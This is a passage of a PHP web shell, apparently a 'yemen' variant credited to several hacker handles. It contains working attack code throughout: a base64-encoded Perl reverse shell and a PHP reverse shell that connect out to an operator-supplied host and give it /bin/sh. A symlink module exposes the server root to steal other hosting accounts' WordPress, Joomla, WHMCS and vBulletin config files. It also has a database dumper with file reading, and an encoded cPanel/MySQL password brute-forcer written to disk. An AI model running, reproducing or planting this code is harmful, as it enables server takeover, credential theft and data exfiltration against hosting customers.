"; yemenfooter(); } function yemenconnect() { yemenhead(); $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; echo "

| PERL AND PHP(threads) BACK CONNECT |

"; echo ""; echo "
"; if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, base64_decode($t)); @fclose($w); } } if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p); $out = yemenEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); echo "

Successfully opened reverse shell to " . $_POST['p2'] . ":" . $_POST['p3'] . "
Connecting...

"; @unlink("/tmp/bc.pl"); } if ($_POST['p1'] == 'php') { @set_time_limit(0); $ip = $_POST['p2']; $port = $_POST['p3']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; echo "

";
if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == - 1) {
echo "Cant fork!
";
exit(1); } if ($pid) {
exit(0); } if (posix_setsid() == - 1) {
echo "Error: Can't setsid()
";
exit(1); } $daemon = 1;
} else { echo "WARNING: Failed to daemonise.  This is quite common and not fatal
";
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) { echo "$errstr ($errno)"; exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) { echo "ERROR: Can't spawn shell
"; exit(1);
}
@stream_set_blocking($pipes[0], 0);
@stream_set_blocking($pipes[1], 0);
@stream_set_blocking($pipes[2], 0);
@stream_set_blocking($sock, 0);
echo "Successfully opened reverse shell to $ip:$port
";
while (1) { if (feof($sock)) {
echo "ERROR: Shell connection terminated
";
break; } if (feof($pipes[1])) {
echo "ERROR: Shell process terminated
";
break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = @stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) {
if ($debug) echo "SOCK READ
";
$input = fread($sock, $chunk_size);
if ($debug) echo "SOCK: $input
";
fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) {
if ($debug) echo "STDOUT READ
";
$input = fread($pipes[1], $chunk_size);
if ($debug) echo "STDOUT: $input
";
fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) {
if ($debug) echo "STDERR READ
";
$input = fread($pipes[2], $chunk_size);
if ($debug) echo "STDERR: $input
";
fwrite($sock, $input); }
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo "

"; } } echo "

"; yemenfooter(); } function yemenyemen() { yemenhead(); echo "

Upgrade By 3Turr
Old version Developed by Monds & hatrk
respect the coders ^_^"; yemenfooter(); } function yemensymlink() { yemenhead(); $IIIIIIIIIIIl = 'http://' . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $IIIIIIIIIII1 = explode('/', $IIIIIIIIIIIl); $IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1) - 1], '', $IIIIIIIIIIIl); echo '

| Domains |
| ls -n /sym|
| Config PHP symlink |

'; if (isset($_POST['p1']) && $_POST['p1'] == 'website') { echo ""; $d0mains = @file("/etc/named.conf"); if (!$d0mains) { echo "

Cant access this file on server -> [ /etc/named.conf ]

"; } echo ""; $count = 1; foreach ($d0mains as $d0main) { if (@eregi("zone", $d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); echo ""; flush(); $count++; } } } echo "

Count	domains	users
" . $count . "	" . $domains[1][0] . "	" . $user['name'] . "

"; } if (isset($_POST['p2']) && $_POST['p2'] == 'whole') { @set_time_limit(0); echo ""; @mkdir('sym', 0777); $IIIIIIIIIIl1 = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; $IIIIIIIIII1I = @fopen('sym/.htaccess', 'w'); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); @symlink('/', 'sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if (!$IIIIIIIIIllI) { echo "

# Cant access this file on server -> [ /etc/named.conf ]

" . $IIIIIIIIIl11[1][0] . '

'; } echo " "; flush(); } } } } echo "

Domains	Users	symlink
' . $IIIIIIII1I1l . '	' . $IIIIIIIII1I1['name'] . "	symlink

"; } if (isset($_POST['p3']) && $_POST['p3'] == 'config') { echo ""; @mkdir('sym', 0777); $IIIIIIIIIIl1 = "Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any"; $IIIIIIIIII1I = @fopen('sym/.htaccess', 'w'); @fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); @symlink('/', 'sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if (!$IIIIIIIIIllI) { echo "

# Cant access this file on server -> [ /etc/named.conf ]

"; } else { echo " "; foreach ($IIIIIIIIIllI as $IIIIIIIIIll1) { if (@eregi('zone', $IIIIIIIIIll1)) { preg_match_all('#zone "(.*)"#', $IIIIIIIIIll1, $IIIIIIIIIl11); flush(); if (strlen(trim($IIIIIIIIIl11[1][0])) > 2) { $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/' . $IIIIIIIIIl11[1][0])); $IIIIIIIII1l1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/wp-config.php'; $IIIIIIIII11I = get_headers($IIIIIIIII1l1); $IIIIIIIII11l = $IIIIIIIII11I[0]; $IIIIIIIII111 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/blog/wp-config.php'; $IIIIIIIIlIII = get_headers($IIIIIIIII111); $IIIIIIIIlIIl = $IIIIIIIIlIII[0]; $IIIIIIIIlII1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/configuration.php'; $IIIIIIIIlIlI = get_headers($IIIIIIIIlII1); $IIIIIIIIlIll = $IIIIIIIIlIlI[0]; $IIIIIIIIlIl1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/joomla/configuration.php'; $IIIIIIIIlI1I = get_headers($IIIIIIIIlIl1); $IIIIIIIIlI1l = $IIIIIIIIlI1I[0]; $IIIIIIIIlI11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/includes/config.php'; $IIIIIIIIllII = get_headers($IIIIIIIIlI11); $IIIIIIIIllIl = $IIIIIIIIllII[0]; $IIIIIIIIllI1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/vb/includes/config.php'; $IIIIIIIIlllI = get_headers($IIIIIIIIllI1); $IIIIIIIIllll = $IIIIIIIIlllI[0]; $IIIIIIIIlll1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/forum/includes/config.php'; $IIIIIIIIll1I = get_headers($IIIIIIIIlll1); $IIIIIIIIll1l = $IIIIIIIIll1I[0]; $IIIIIIIIll11 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . 'public_html/clients/configuration.php'; $IIIIIIIIl1II = get_headers($IIIIIIIIll11); $IIIIIIIIl1Il = $IIIIIIIIl1II[0]; $IIIIIIIIl1I1 = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/support/configuration.php'; $IIIIIIIIl1II = get_headers($IIIIIIIIl1I1); $IIIIIIIIl1lI = $IIIIIIIIl1II[0]; $IIIIIIIIl1ll = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php'; $IIIIIIIIl1l1 = get_headers($IIIIIIIIl1ll); $IIIIIIIIl11I = $IIIIIIIIl1l1[0]; $IIIIIIIIl11l = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/submitticket.php'; $IIIIIIIIl111 = get_headers($IIIIIIIIl11l); $IIIIIIII1III = $IIIIIIIIl111[0]; $IIIIIIII1IIl = $IIIIIIIIIIIl . '/sym/root/home/' . $IIIIIIIII1I1['name'] . '/public_html/client/configuration.php'; $IIIIIIII1II1 = get_headers($IIIIIIII1IIl); $IIIIIIII1IlI = $IIIIIIII1II1[0]; $IIIIIIII1Ill = strpos($IIIIIIIII11l, '200'); $IIIIIIII1I1I = ' '; if (strpos($IIIIIIIII11l, '200') == true) { $IIIIIIII1I1I = "Wordpress"; } elseif (strpos($IIIIIIIIlIIl, '200') == true) { $IIIIIIII1I1I = "Wordpress"; } elseif (strpos($IIIIIIIIlIll, '200') == true and strpos($IIIIIIII1III, '200') == true) { $IIIIIIII1I1I = " WHMCS"; } elseif (strpos($IIIIIIIIl1lI, '200') == true) { $IIIIIIII1I1I = " WHMCS"; } elseif (strpos($IIIIIIIIl11I, '200') == true) { $IIIIIIII1I1I = " WHMCS"; } elseif (strpos($IIIIIIIIlIll, '200') == true) { $IIIIIIII1I1I = " Joomla"; } elseif (strpos($IIIIIIIIlI1l, '200') == true) { $IIIIIIII1I1I = " Joomla"; } elseif (strpos($IIIIIIIIllIl, '200') == true) { $IIIIIIII1I1I = " vBulletin"; } elseif (strpos($IIIIIIIIllll, '200') == true) { $IIIIIIII1I1I = " vBulletin"; } elseif (strpos($IIIIIIIIll1l, '200') == true) { $IIIIIIII1I1I = " vBulletin"; } else { continue; } $IIIIIIII1I1l = $IIIIIIIII1I1['name']; echo ''; flush(); } } } } echo "

Domains	Script
' . $IIIIIIIIIl11[1][0] . '	' . $IIIIIIII1I1I . '

"; } echo "

"; yemenfooter(); } function yemensql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) return true; break; case 'pgsql': $host = explode(':', $host); if (!$host[1]) $host[1] = 5432; if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true; break; } return false; } function selectdb($db) { switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) return true; break; } return false; } function query($str) { switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET ' . $str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); $r = array(); while ($i = $this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file' => implode(" ", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); $create = mysql_fetch_array($res); $sql = $create[1] . "; "; if ($fp) fwrite($fp, $sql); else echo ($sql); $this->query('SELECT * FROM `' . $table . '`'); $head = true; while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) $item[$k] = "NULL"; elseif (is_numeric($v)) $item[$k] = $v; else $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; $columns[] = "`" . $k . "`"; } if ($head) { $sql = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES (" . implode(", ", $item) . ')'; $head = false; } else $sql = " ,(" . implode(", ", $item) . ')'; if ($fp) fwrite($fp, $sql); else echo ($sql); } if (!$head) if ($fp) fwrite($fp, "; "); else echo ("; "); break; case 'pgsql': $this->query('SELECT * FROM ' . $table); while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . " "; if ($fp) fwrite($fp, $sql); else echo ($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if (@$_POST['p2'] == 'download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if (empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST['tbl'] as $v) $db->dump($v); exit; } elseif ($fp = @fopen($_POST['file'], 'w')) { foreach ($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } yemenhead(); echo "

Type	Host	Login	Password	Database
				"; $tmp = ""; if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; } else echo $tmp; echo "		count the number of rows

"; if (isset($db) && $db->link) { echo "
"; if (!empty($_POST['sql_base'])) { $db->selectdb($_POST['sql_base']); echo ""; } echo "

Tables:

"; $tbls_res = $db->listTables(); while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); $value = htmlspecialchars($value); echo " " . $value . "" . (empty($_POST['sql_count']) ? ' ' : " ({$n['n']})") . "
"; } echo "
File path:

"; if (@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "" . $_POST['p2'] . " ({$num['n']} records) Page # "; echo " of $pages"; if ($_POST['p3'] > 1) echo " < Prev"; if ($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if ($_POST['type'] == 'pgsql') $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30); else $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30'; echo "

"; } if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { $title = false; echo ''; $line = 1; while ($item = $db->fetch()) { if (!$title) { echo ''; foreach ($item as $key => $value) echo ''; reset($item); $title = true; echo ''; $line = 2; } echo ''; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) echo ''; else echo ''; } echo ''; } echo '

' . $key . '
null	' . nl2br(htmlspecialchars($value)) . '

'; } else { echo '

Error: ' . htmlspecialchars($db->error()) . '

'; } } echo "

"; if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) echo ""; } if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '

' . htmlspecialchars($file['file']) . '

'; } } else { echo htmlspecialchars($db->error()); } echo '

'; yemenfooter(); } function yemenbf() { yemenhead(); $cp1 = 'PD9waHANCkBzZXRfdGltZV9saW1pdCgwKTsNCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQplY2hvICcNCjxoZWFkPg0KDQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keSB7DQoJYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCiAgICBmb250LXNpemU6IDE4cHg7DQoJY29sb3I6ICNjY2NjY2M7DQp9DQppbnB1dCx0ZXh0YXJlYSxzZWxlY3R7DQpmb250LXdlaWdodDogYm9sZDsNCmNvbG9yOiAjY2NjY2NjOw0KZGFzaGVkICNmZmZmZmY7DQpib3JkZXI6IDFweA0Kc29saWQgIzJDMkMyQzsNCmJhY2tncm91bmQtY29sb3I6ICMwODA4MDgNCn0NCmEgew0KCWJhY2tncm91bmQtY29sb3I6ICMxNTE1MTU7DQoJdmVydGljYWwtYWxpZ246IGJvdHRvbTsNCgljb2xvcjogIzAwMDsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC1zaXplOiAyMHB4Ow0KCW1hcmdpbjogOHB4Ow0KCXBhZGRpbmc6IDZweDsNCglib3JkZXI6IHRoaW4gc29saWQgIzAwMDsNCn0NCmE6aG92ZXIgew0KCWJhY2tncm91bmQtY29sb3I6ICMwODA4MDg7DQoJdmVydGljYWwtYWxpZ246IGJvdHRvbTsNCgljb2xvcjogIzMzMzsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC1zaXplOiAyMHB4Ow0KCW1hcmdpbjogOHB4Ow0KCXBhZGRpbmc6IDZweDsNCglib3JkZXI6IHRoaW4gc29saWQgIzAwMDsNCn0NCi5zdHlsZTEgew0KCXRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5zdHlsZTIgew0KCWNvbG9yOiAjRkZGRkZGOw0KCWZvbnQtd2VpZ2h0OiBib2xkOw0KfQ0KLnN0eWxlMyB7DQoJY29sb3I6ICNGRkZGRkY7DQp9DQotLT4NCjwvc3R5bGU+DQoNCjwvaGVhZD4NCic7DQpmdW5jdGlvbiBpbigkdHlwZSwkbmFtZSwkc2l6ZSwkdmFsdWUsJGNoZWNrZWQ9MCkgDQp7DQokcmV0ID0gIjxpbnB1dCB0eXBlPSIuJHR5cGUuIiBuYW1lPSIuJG5hbWUuIiAiO2lmKCRzaXplICE9IDApIA0Kew0KJHJldCAuPSAic2l6ZT0iLiRzaXplLiIgIjt9DQokcmV0IC49ICJ2YWx1ZT1cIiIuJHZhbHVlLiJcIiI7aWYoJGNoZWNrZWQpICRyZXQgLj0gIiBjaGVja2VkIjtyZXR1cm4gJHJldC4iPiI7fQ0KZWNobyAiPGJyPjx0aXRsZT5CcnV0ZSBGb3JjZSBCeSBNb25kczwvdGl0bGU+PGZvcm0gbmFtZT1mb3JtIG1ldGhvZD1QT1NUPiI7DQplY2hvIGluKCdoaWRkZW4nLCdkYicsMCwkX1BPU1RbJ2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2RiX3NlcnZlcicsMCwkX1BPU1RbJ2RiX3NlcnZlciddKTtlY2hvIGluKCdoaWRkZW4nLCdkYl9wb3J0JywwLCRfUE9TVFsnZGJfcG9ydCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9sJywwLCRfUE9TVFsnbXlzcWxfbCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9wJywwLCRfUE9TVFsnbXlzcWxfcCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9kYicsMCwkX1BPU1RbJ215c3FsX2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2NjY2MnLDAsJ2RiX3F1ZXJ5Jyk7DQoNCmlmKCRfUE9TVFsncGFnZSddPT0nZmluZCcpDQp7DQppZihpc3NldCgkX1BPU1RbJ3VzZXJuYW1lcyddKSAmJmlzc2V0KCRfUE9TVFsncGFzc3dvcmRzJ10pKQ0Kew0KaWYoJF9QT1NUWyd0eXBlJ10gPT0gJ3Bhc3N3ZCcpew0KJGUgPSBleHBsb2RlKCJcbiIsJF9QT1NUWyd1c2VybmFtZXMnXSk7DQpmb3JlYWNoKCRlIGFzICR2YWx1ZSl7DQokayA9IGV4cGxvZGUoIjoiLCR2YWx1ZSk7DQokdXNlcm5hbWUgLj0gJGtbJzAnXS4iICI7DQp9DQp9ZWxzZWlmKCRfUE9TVFsndHlwZSddID09ICdzaW1wbGUnKXsNCiR1c2VybmFtZSA9IHN0cl9yZXBsYWNlKCJcbiIsJyAnLCRfUE9TVFsndXNlcm5hbWVzJ10pOw0KfQ0KJGExID0gZXhwbG9kZSgiICIsJHVzZXJuYW1lKTsNCiRhMiA9IGV4cGxvZGUoIlxuIiwkX1BPU1RbJ3Bhc3N3b3JkcyddKTsNCiRpZDIgPSBjb3VudCgkYTIpOw0KJG9rID0gMDsNCmZvcmVhY2goJGExIGFzICR1c2VyICkNCnsNCmlmKCR1c2VyICE9PSAnJykNCnsNCiR1c2VyPXRyaW0oJHVzZXIpOw0KZm9yKCRpPTA7JGk8PSRpZDI7JGkrKykNCnsNCiRwYXNzID0gdHJpbSgkYTJbJGldKTsNCmlmKEBteXNxbF9jb25uZWN0KCdsb2NhbGhvc3QnLCR1c2VyLCRwYXNzKSkNCnsNCmVjaG8gIkJMQUNLfiB1c2VyIGlzICg8Yj48Zm9udCBjb2xvcj1ncmVlbj4kdXNlcjwvZm9udD48L2I+KSBQYXNzd29yZCBpcyAoPGI+PGZvbnQgY29sb3I9Z3JlZW4+JHBhc3M8L2ZvbnQ+PC9iPik8YnIgLz4iOw0KJG9rKys7DQp9DQp9DQp9DQp9DQplY2hvICI8aHI+PGI+WW91IEZvdW5kIDxmb250IGNvbG9yPWdyZWVuPiRvazwvZm9udD4gQ3BhbmVsIEJ5IEJMQUNLIFNjcmlwdCBOYW1lPC9iPiI7DQplY2hvICI8Y2VudGVyPjxiPjxhIGhyZWY9Ii4kX1NFUlZFUlsnUEhQX1NFTEYnXS4iPkJBQ0s8L2E+IjsNCmV4aXQ7DQp9DQp9DQo7ZWNobyAnDQoNCg0KDQo8Zm9ybSBtZXRob2Q9IlBPU1QiIHRhcmdldD0iX2JsYW5rIj4NCgk8c3Ryb25nPg0KPGlucHV0IG5hbWU9InBhZ2UiIHR5cGU9ImhpZGRlbiIgdmFsdWU9ImZpbmQiPiAgICAgICAgCQkJCQ0KICAgIDwvc3Ryb25nPg0KICAgIDx0YWJsZSB3aWR0aD0iNjAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+DQogICAgPHRyPg0KICAgICAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiPjxjZW50ZXI+PGJyPg0KCQk8L3N0cm9uZz4NCgkJPGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL21vbmRzLmhhY2tlcnMiIGNsYXNzPSJzdHlsZTIiPjxzdHJvbmc+RGV2ZWxvcGVkIEJ5IA0KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk1vbmRzPC9mb250Pjwvc3Ryb25nPjwvYT48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+PC9jZW50ZXI+PC90ZD48L2ZvbnQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgPHRkPg0KICAgIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMyIgY2VsbHNwYWNpbmc9IjEiIGFsaWduPSJjZW50ZXIiPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgY2xhc3M9InN0eWxlMiIgc3R5bGU9IndpZHRoOiAxMzlweCI+DQoJPHN0cm9uZz5Vc2VyIDo8L3N0cm9uZz48L3RkPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgY29sc3Bhbj0iNSI+PHN0cm9uZz48dGV4dGFyZWEgY29scz0iNDAiIHJvd3M9IjEwIiBuYW1lPSJ1c2VybmFtZXMiPjwvdGV4dGFyZWE+PC9zdHJvbmc+PC90ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNsYXNzPSJzdHlsZTIiIHN0eWxlPSJ3aWR0aDogMTM5cHgiPg0KCTxzdHJvbmc+UGFzcyA6PC9zdHJvbmc+PC90ZD4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNvbHNwYW49IjUiPjxzdHJvbmc+PHRleHRhcmVhIGNvbHM9IjQwIiByb3dzPSIxMCIgbmFtZT0icGFzc3dvcmRzIj48L3RleHRhcmVhPjwvc3Ryb25nPjwvdGQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgPHRkIHZhbGlnbj0idG9wIiBiZ2NvbG9yPSIjMTUxNTE1IiBjbGFzcz0ic3R5bGUyIiBzdHlsZT0id2lkdGg6IDEzOXB4Ij4NCgk8c3Ryb25nPlR5cGUgOjwvc3Ryb25nPjwvdGQ+DQogICAgPHRkIHZhbGlnbj0idG9wIiBiZ2NvbG9yPSIjMTUxNTE1IiBjb2xzcGFuPSI1Ij4NCiAgICA8c3BhbiBjbGFzcz0ic3R5bGUyIj48c3Ryb25nPlNpbXBsZSA6IDwvc3Ryb25nPiA8L3NwYW4+DQoJPHN0cm9uZz4NCgk8aW5wdXQgdHlwZT0icmFkaW8iIG5hbWU9InR5cGUiIHZhbHVlPSJzaW1wbGUiIGNoZWNrZWQ9ImNoZWNrZWQiIGNsYXNzPSJzdHlsZTMiPjwvc3Ryb25nPg0KICAgIDxmb250IGNsYXNzPSJzdHlsZTIiPjxzdHJvbmc+L2V0Yy9wYXNzd2QgOiA8L3N0cm9uZz4gPC9mb250Pg0KCTxzdHJvbmc+DQoJPGlucHV0IHR5cGU9InJhZGlvIiBuYW1lPSJ0eXBlIiB2YWx1ZT0icGFzc3dkIiBjbGFzcz0ic3R5bGUzIj48L3N0cm9uZz48c3BhbiBjbGFzcz0ic3R5bGUzIj48c3Ryb25nPg0KCTwvc3Ryb25nPg0KCTwvc3Bhbj4NCiAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgc3R5bGU9IndpZHRoOiAxMzlweCI+PC90ZD4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNvbHNwYW49IjUiPjxzdHJvbmc+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9InN0YXJ0Ij4NCiAgICA8L3N0cm9uZz4NCiAgICA8L3RkPg0KICAgIDx0cj4NCjwvZm9ybT4gICAgDQogICAgDQogICAgDQogICANCic7DQppZigkX1BPU1RbJ2F0dCddPT1udWxsKQ0Kew0KZWNobyAnCQkJCQkJICc7DQp9ZWxzZXsNCmVjaG8gIgkJCQkJCSANCgkJCQkJCSANCiI7DQp9'; $file = fopen("cpanel.php", "w+"); $file = fopen("cpanel.php", "w+"); $write = fwrite($file, base64_decode($cp1)); fclose($file); echo '